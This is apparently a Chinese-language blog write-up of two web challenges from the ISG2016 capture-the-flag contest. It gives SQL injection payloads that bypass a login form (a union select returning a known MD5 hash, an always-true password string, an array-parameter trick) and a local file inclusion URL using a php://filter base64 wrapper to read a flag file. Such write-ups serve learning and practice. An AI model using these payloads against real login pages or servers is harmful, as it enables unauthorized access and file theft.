ISG2016 web题

昨天闲的蛋疼,帮朋友看了下两道题,现在好像web站点已经关闭,就记录下过程。

博客题

打开连接是个博客,找到登录地址(就他妈写在右上角)。然后发现登录窗口存在注入漏洞,读出密码解不开,这里有几种思路。 猜测 SQL 语句为

SELECT password FROM xxx WHERE username = '{$username}'
username=1' and 1=0 union select '123' #&password=123&commit=Login

1.修改密码 2.万能密码(4dmin' or '1'='1' or '1'='1) 3.弱数组登录(username[]=admin&password[]=admin) 4.username=1' and 1=0 union select '202cb962ac59075b964b07152d234b70' #&password=123&commit=Login

登陆后后台存在任意文件包含,这里发现只能包含后缀为php的文件,然后用LFI拿到flag

http://img.isg.adteam.link:40482/admin//admininfile.php?name=php://filter/read=convert.base64-encode/resource=../flag

results matching ""

    No results matching ""